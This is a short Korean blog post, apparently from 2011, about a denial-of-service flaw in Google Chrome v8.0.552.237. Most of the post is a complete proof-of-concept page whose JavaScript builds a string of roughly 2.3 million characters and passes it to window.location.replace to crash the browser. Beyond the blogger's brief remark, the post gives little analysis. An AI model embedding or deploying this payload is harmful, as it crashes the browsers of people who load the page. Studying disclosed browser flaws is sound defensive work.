[Google] Google Chrome v8.0.552.237 .replace DOS

구글 크롬(Google Chrome)의 최신버전에 대한 취약점이 발표되었다.

항상 IE나 FF에만 신경을 썻지, 구글 크롬은 안전하겠거니 라는 안일한 생각을 해왔었는데~ 이제 크롬도 더이상 안전지대가 아니네요 ㅠㅠ

- POC 코드(이 코드로 인하여 블로그가 구글 또는 IE8에서 악성으로 탐지 될 수 있습니다^^)

<html>

<head>

# Exploit Title: Google Chrome v8.0.552.237 .replace DOS

# Date: January 30 2011

# Author: Carlos Mario Penagos Hollmann

# Software Link: http://www.google.com/chrome

# Version: v8.0.552.237

# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8

#  mail----> shogilord^gmail.com spams are welcome!!!!!

#    ________  _    _________   ____ __ _____   ________

#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/

#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __

# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /

#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/

# COLOMBIA hacking presents.............

#   

# Google Check the replace

#

<script type="text/javascript">

function mul(str,count){

    if(count==0) return '';

    var binaryCount = count.toString(2);

    var numDegree = binaryCount.length;

    var resultStr='';

    for(var i=0; i<numDegree; i++){

        resultStr+=resultStr;

        if(binaryCount.charAt(i) == '1'){

            resultStr+=str;

        }

    }

    return resultStr;

}

var junka = "a";

var junk = mul(junka,2304453);

window.location.replace("http://" + junk);

</script>

</head>

<body>

</body>

</html>

저작자표시 비영리 변경금지 (새창열림)

'취약점소식' 카테고리의 다른 글

[Adobe]Adobe Acrobat Reader Remote Code Execution Vulnerability in Flash Player(CVE-2011-0611) (1)	2011.04.12
[Adobe]Adobe Acrobat Reader Remote Code Execution Vulnerability in Flash Player(CVE-2011-0609) (0)	2011.03.15
[MS] Vulnerability in MHTML Could Allow Information Disclosure(CVE-2011-0096) (0)	2011.01.29
[MS] Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution(CVE-2010-3970) (0)	2011.01.05
[MS] Vulnerability in Internet Explorer Could Allow Remote Code Execution(CVE-2010-3971) (0)	2010.12.23